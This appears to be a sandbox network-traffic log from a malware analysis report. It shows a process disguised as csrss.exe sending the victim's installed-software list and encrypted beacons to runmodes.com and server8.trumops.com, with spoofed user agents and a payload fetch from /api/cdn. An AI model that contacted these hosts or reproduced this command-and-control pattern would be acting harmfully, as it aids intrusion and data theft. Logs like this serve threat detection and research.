                                                                                                                          2021-11-11 00:57:26 UTC1OUTData Raw: 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 20 66 6f 72 20 42 75 73 69 6e 65 73 73 20 28 4b 42 34 30 32 32 32 31 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 43 6f 6e 6e 65 63 74 69 6f 6e 20 4d 61 6e 61 67 65 72 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 57
                                                                                                                          Data Ascii: },{"display_name":"Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Connection Manager","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft W
                                                                                                                          2021-11-11 00:57:26 UTC3OUTData Raw: 2e 33 30 35 30 31 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 32 2e 30 2e 33 30 35 30 31 2e 30 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 50 72 6f 6a 65 63 74 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 36 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 37
                                                                                                                          Data Ascii: .30501","display_version":"12.0.30501.0","install_date":""},{"display_name":"Security Update for Microsoft Project 2016 (KB4484269) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Excel 2016 (KB448427
                                                                                                                          2021-11-11 00:57:26 UTC4OUTData Raw: 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 37 35 35 38 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 31 34 33 35 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c
                                                                                                                          Data Ascii: ersion":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4475588) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4461435) 32-Bit Edition","display_version":"","install
                                                                                                                          2021-11-11 00:57:26 UTC8OUTData Raw: 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 33 31 31 38 32 36 33 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 50 72 6f 6a 65 63 74 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 36 39 29 20 33 32 2d 42 69 74 20 45 64 69 74
                                                                                                                          Data Ascii: _version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Update for Microsoft Office 2016 (KB3118263) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Project 2016 (KB4484269) 32-Bit Edit
                                                                                                                          2021-11-11 00:57:26 UTC12OUTData Raw: 32 31 30 30 35 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 4f 53 4d 20 55 58 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 32 30 31 36 20 28 4b 42 34 34 38 34 33 30 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73
                                                                                                                          Data Ascii: 21005","install_date":"20190627"},{"display_name":"Microsoft Office OSM UX MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition","display_vers
                                                                                                                          2021-11-11 00:57:26 UTC16OUTData Raw: 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 38 37 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 30 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73
                                                                                                                          Data Ascii: :""},{"display_name":"Security Update for Microsoft Office 2016 (KB4484287) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484106) 32-Bit Edition","display_version":"","install_date":""},{"dis
                                                                                                                          2021-11-11 00:57:26 UTC19INHTTP/1.1 404 Not Found
                                                                                                                          Date: Thu, 11 Nov 2021 00:57:26 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/8.0.11
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bKtxxp476cwRWpL7PMsiOEiUQCqwyb3bZEaJ0AAlC%2FT9jGwQdvS7Se%2BfmHEOErvcAP%2B4zdZUYVGNLmzkEYvbf2eQj3YtbAsdfhB5eIGhFyxOPCEF4oO6j5HX%2FobEjzLNcm0pI2mw"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac39101ef046927-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          2021-11-11 00:57:26 UTC20INData Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
                                                                                                                          2021-11-11 00:57:26 UTC21INData Raw: 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c
                                                                                                                          Data Ascii: "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head><
                                                                                                                          2021-11-11 00:57:26 UTC21INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          2192.168.2.349749104.21.34.203443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-11-11 00:57:29 UTC21OUTPOST /api/log HTTP/1.1
                                                                                                                          Host: runmodes.com
                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                          Content-Length: 132
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          2021-11-11 00:57:29 UTC21OUTData Raw: 55 33 2f 36 31 6c 2b 6b 4c 48 31 69 49 4a 41 49 76 71 79 64 37 55 4e 55 63 69 51 4f 36 4a 39 70 30 41 2f 72 61 70 44 41 45 76 73 46 52 4c 6b 49 30 62 61 49 45 39 4a 70 77 77 71 48 34 4b 4d 2f 71 4c 35 53 77 59 4c 73 6f 44 6d 49 41 2f 62 72 4e 4b 4d 61 63 4f 46 47 41 72 6c 69 68 31 43 61 6d 4e 6d 57 71 6c 4b 64 77 61 4a 45 76 54 2b 39 4b 47 70 42 71 35 43 44 78 58 54 49 47 67 2b 75 37 67 3d 3d
                                                                                                                          Data Ascii: U3/61l+kLH1iIJAIvqyd7UNUciQO6J9p0A/rapDAEvsFRLkI0baIE9JpwwqH4KM/qL5SwYLsoDmIA/brNKMacOFGArlih1CamNmWqlKdwaJEvT+9KGpBq5CDxXTIGg+u7g==
                                                                                                                          2021-11-11 00:57:29 UTC21INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 11 Nov 2021 00:57:29 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VyqJdFK9C8SN%2BxUGjV5xrMiZwo7X7ojpe%2BJ9gkaT0LAMY7mP9r15bftL7%2BilJqKAlQpYnxOV6ufwEkwSyOrShNubJWJa1Zwhw44yTnybBgDNVepuofVl9tVybkDCX%2Bc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac39119af7942d5-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          3192.168.2.349750104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-11-11 00:57:31 UTC22OUTPOST /api/poll HTTP/1.1
                                                                                                                          Host: server8.trumops.com
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
                                                                                                                          Content-Length: 652
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          2021-11-11 00:57:31 UTC22OUTData Raw: 4b 38 6a 58 39 4f 57 4d 58 56 70 64 78 6e 4e 35 31 61 63 37 56 45 43 76 4e 73 55 74 34 75 49 74 55 4c 31 37 4f 52 77 6a 76 4a 2f 59 52 31 34 79 2f 32 7a 2f 58 4f 56 52 39 64 56 76 48 5a 6c 57 42 45 34 45 49 38 50 66 45 56 53 71 42 48 52 55 4d 68 59 76 50 41 58 6c 79 4d 50 72 53 5a 48 32 42 72 52 42 37 43 69 77 57 6e 6c 4b 41 4d 76 4e 5a 4e 37 63 4b 31 63 50 37 4e 6d 33 71 43 44 7a 54 43 76 41 43 49 52 79 42 7a 48 6f 6f 6d 43 7a 52 76 77 68 43 57 74 76 6d 61 63 78 52 48 49 6d 6b 75 62 6b 68 55 5a 73 54 30 4d 39 30 55 72 52 6c 4a 32 30 64 44 53 79 73 6f 4e 68 76 78 6b 58 6b 47 70 2b 6e 53 4d 4e 2f 4e 31 6c 56 4b 44 66 6f 34 66 31 46 30 75 4b 4f 70 31 37 6e 36 50 52 43 38 43 33 34 75 37 6e 77 67 64 6e 58 62 69 45 76 47 65 64 66 36 75 62 6b 73 53 66 69 5a 35
                                                                                                                          Data Ascii: K8jX9OWMXVpdxnN51ac7VECvNsUt4uItUL17ORwjvJ/YR14y/2z/XOVR9dVvHZlWBE4EI8PfEVSqBHRUMhYvPAXlyMPrSZH2BrRB7CiwWnlKAMvNZN7cK1cP7Nm3qCDzTCvACIRyBzHoomCzRvwhCWtvmacxRHImkubkhUZsT0M90UrRlJ20dDSysoNhvxkXkGp+nSMN/N1lVKDfo4f1F0uKOp17n6PRC8C34u7nwgdnXbiEvGedf6ubksSfiZ5
                                                                                                                          2021-11-11 00:57:31 UTC23INHTTP/1.1 404 Not Found
                                                                                                                          Date: Thu, 11 Nov 2021 00:57:31 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/8.0.11
                                                                                                                          set-cookie: PHPSESSID=gv8mampiuh95qf18cj0go9m89u; path=/; HttpOnly
                                                                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          cache-control: no-store, no-cache, must-revalidate
                                                                                                                          pragma: no-cache
                                                                                                                          access-control-allow-credentials: false
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RBPQOW%2BDKJcfajEWjUAp5sEAC%2F%2FnnEUjdXStK%2Byc0Yn65mfutwtYjwiIq%2BUlGvNK0I8GjSutN%2BRWb2fq4knditxLDLYpwlGC1tM5sB3%2F2PrElhih1ODR82MTA1P9qvUN7SYUkd8C"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac39121ec73701b-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          2021-11-11 00:57:31 UTC24INData Raw: 65 38 0d 0a 54 46 69 6b 7a 67 75 4f 39 61 71 32 2f 67 64 47 51 52 66 46 32 7a 2b 61 79 6f 78 33 6a 62 2b 71 70 4c 75 69 2b 7a 59 2b 2b 6e 39 68 53 53 7a 2f 5a 4b 49 68 59 33 45 70 35 64 4d 45 67 65 63 2b 72 79 4d 7a 58 34 31 5a 6a 42 2b 62 6d 72 51 51 38 4f 59 63 54 4a 58 68 59 78 68 47 4d 72 73 6f 4c 54 75 6e 5a 79 6c 55 32 79 6f 74 51 42 6b 45 53 35 4c 39 6d 52 2b 64 43 55 4e 50 72 66 36 49 68 53 72 4a 33 5a 34 4d 68 75 38 32 78 4a 61 47 38 57 4c 58 58 73 78 72 45 50 74 37 41 41 64 30 7a 49 4b 2f 64 35 56 33 2f 5a 6c 4c 65 73 4e 77 50 44 5a 44 50 5a 4a 61 52 39 6f 44 76 4d 6c 6e 54 2b 51 6c 46 31 53 53 32 6d 55 6b 49 6e 32 71 67 6d 48 65 72 78 75 59 4a 68 49 50 7a 65 45 70 32 33 5a 6e 58 41 3d 3d 0d 0a
                                                                                                                          Data Ascii: e8TFikzguO9aq2/gdGQRfF2z+ayox3jb+qpLui+zY++n9hSSz/ZKIhY3Ep5dMEgec+ryMzX41ZjB+bmrQQ8OYcTJXhYxhGMrsoLTunZylU2yotQBkES5L9mR+dCUNPrf6IhSrJ3Z4Mhu82xJaG8WLXXsxrEPt7AAd0zIK/d5V3/ZlLesNwPDZDPZJaR9oDvMlnT+QlF1SS2mUkIn2qgmHerxuYJhIPzeEp23ZnXA==
                                                                                                                          2021-11-11 00:57:31 UTC24INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          4192.168.2.349751172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-11-11 00:57:46 UTC24OUTGET /api/cdn?c=3e3f6b9a36a75d40&uuid=f7873597-7b36-4441-9416-097456f134ae HTTP/1.1
                                                                                                                          Host: server8.trumops.com
                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          2021-11-11 00:57:46 UTC24INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 11 Nov 2021 00:57:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/8.0.11
                                                                                                                          access-control-allow-credentials: false
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CM%2FrIhBKgG20%2BqPmJLNt9KnFum7hSY2ZhshN5CwoR1EpGJacvDIwP9IxmL4j9XgxPa%2F5x4MWnFzO7NsDvxwaGVTqz6hMc8uB8CenUSjE3KJeFotS3I65qzd970115mE7QLIpEfxq"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac3917ed8c4749d-LHR
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          2021-11-11 00:57:46 UTC25INData Raw: 31 33 34 0d 0a 46 76 66 74 38 72 39 6a 57 59 4f 4f 52 4a 64 55 41 7a 36 58 41 54 5a 42 69 6c 52 54 67 4e 41 30 48 2b 4d 5a 75 50 55 4c 49 75 69 78 59 57 38 34 4d 38 30 42 74 7a 45 34 72 48 5a 79 37 43 56 54 51 64 63 55 30 77 6e 30 75 75 74 48 47 70 64 6a 6d 56 36 6c 70 6e 61 6e 6b 47 66 5a 49 58 6c 4c 6f 30 71 2f 78 39 71 76 47 45 2f 53 72 44 77 4a 68 73 46 38 6f 46 63 47 73 71 2f 53 50 68 46 78 63 68 59 63 68 41 39 69 77 39 4b 55 43 4b 4c 58 77 71 61 6a 47 36 6d 79 59 4d 58 5a 6b 45 7a 65 38 76 77 33 67 53 51 53 39 4a 70 37 31 70 64 61 36 36 43 56 49 6e 4b 35 61 62 39 6b 55 58 53 38 4f 51 32 61 4c 48 58 33 41 50 49 35 74 6e 53 44 57 4e 48 63 55 50 46 4c 75 37 44 49 71 44 75 6c 64 61 78 72 70 79 5a 53 36 42 4e 72 6a 6a 51 4a 4d 32 6a 71 30 53 4f 34 35 67
                                                                                                                          Data Ascii: 134Fvft8r9jWYOORJdUAz6XATZBilRTgNA0H+MZuPULIuixYW84M80BtzE4rHZy7CVTQdcU0wn0uutHGpdjmV6lpnankGfZIXlLo0q/x9qvGE/SrDwJhsF8oFcGsq/SPhFxchYchA9iw9KUCKLXwqajG6myYMXZkEze8vw3gSQS9Jp71pda66CVInK5ab9kUXS8OQ2aLHX3API5tnSDWNHcUPFLu7DIqDuldaxrpyZS6BNrjjQJM2jq0SO45g
                                                                                                                          2021-11-11 00:57:46 UTC25INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          5192.168.2.349754172.67.207.136443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-11-11 00:57:56 UTC25OUTPOST /api/log HTTP/1.1
                                                                                                                          Host: runmodes.com
                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                          Content-Length: 160
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          2021-11-11 00:57:56 UTC26OUTData Raw: 62 4c 33 56 34 47 6f 46 6e 33 6f 4b 50 75 70 68 68 49 53 58 53 4b 34 6e 2b 58 76 64 6e 68 76 39 67 30 50 6a 4e 69 69 6b 55 30 70 50 43 55 55 4e 51 6f 4d 31 70 45 74 6e 36 6d 62 77 6b 57 58 59 62 34 74 65 6b 6b 4f 39 6c 45 71 6b 48 54 34 4a 6a 50 56 68 62 6f 5a 54 79 32 78 30 7a 30 52 2b 64 66 35 6f 33 51 4c 47 73 53 41 36 43 62 76 47 44 7a 50 75 59 37 4c 66 4a 5a 36 30 6a 4e 4a 5a 4e 67 61 30 4a 75 37 42 42 75 4c 4b 43 50 6a 38 39 31 38 53 39 6d 6f 62 45 6a 4a 66 73 51 3d 3d
                                                                                                                          Data Ascii: bL3V4GoFn3oKPuphhISXSK4n+Xvdnhv9g0PjNiikU0pPCUUNQoM1pEtn6mbwkWXYb4tekkO9lEqkHT4JjPVhboZTy2x0z0R+df5o3QLGsSA6CbvGDzPuY7LfJZ60jNJZNga0Ju7BBuLKCPj8918S9mobEjJfsQ==
                                                                                                                          2021-11-11 00:57:56 UTC26INHTTP/1.1 200 OK
                                                                                                                          Date: Thu, 11 Nov 2021 00:57:56 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=83uhlx7ebvkDKlumTtxZ442jGpnIhj5F%2B3khHvd7TZu3XPc97SCIQF1iHIOs0R9z8lBEea9j4dVYkQKRQs%2FnXFqQ89FZxq3u2kjYA8Iye%2Fu6dSB2i1rf40fLuIeEY9M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac391bd4873c303-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          6192.168.2.349808172.67.139.144443C:\Windows\rss\csrss.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-11-11 00:58:41 UTC26OUTPOST /api/poll HTTP/1.1
                                                                                                                          Host: server8.trumops.com
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0
                                                                                                                          Content-Length: 668
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          2021-11-11 00:58:41 UTC27OUTData Raw: 53 62 4f 56 7a 31 57 59 6d 47 43 56 51 2f 55 31 56 53 5a 78 35 78 59 30 55 41 31 62 4d 5a 55 58 4a 65 54 7a 6e 43 54 35 78 39 79 5a 57 6e 72 78 74 76 51 2f 67 37 55 53 69 42 44 30 4f 72 2b 4a 62 35 35 47 64 50 71 4d 43 73 5a 73 63 6b 57 4a 65 4d 34 50 62 53 33 46 2b 31 78 75 31 6f 4d 43 50 38 47 61 76 71 71 4d 47 45 77 4a 58 69 67 4f 7a 73 32 66 2b 57 46 35 43 47 56 59 47 6d 69 68 46 48 57 4a 59 67 6a 41 4b 7a 50 62 70 7a 65 73 37 64 76 33 30 57 46 30 67 74 2b 47 70 75 53 77 6e 7a 42 32 66 31 43 39 38 33 30 56 57 52 54 75 69 67 68 4a 69 6d 2f 43 61 2b 32 66 36 52 34 67 63 59 78 4c 4a 6b 66 53 58 72 33 6d 54 35 73 6a 79 78 77 70 64 61 6a 34 6c 6b 78 4f 31 41 59 7a 39 48 34 4f 34 6b 48 6d 52 2f 54 6c 2f 43 46 33 6c 50 58 52 54 76 37 45 52 65 37 77 36 70 33
                                                                                                                          Data Ascii: SbOVz1WYmGCVQ/U1VSZx5xY0UA1bMZUXJeTznCT5x9yZWnrxtvQ/g7USiBD0Or+Jb55GdPqMCsZsckWJeM4PbS3F+1xu1oMCP8GavqqMGEwJXigOzs2f+WF5CGVYGmihFHWJYgjAKzPbpzes7dv30WF0gt+GpuSwnzB2f1C9830VWRTuighJim/Ca+2f6R4gcYxLJkfSXr3mT5sjyxwpdaj4lkxO1AYz9H4O4kHmR/Tl/CF3lPXRTv7ERe7w6p3
                                                                                                                          2021-11-11 00:58:41 UTC27INHTTP/1.1 404 Not Found
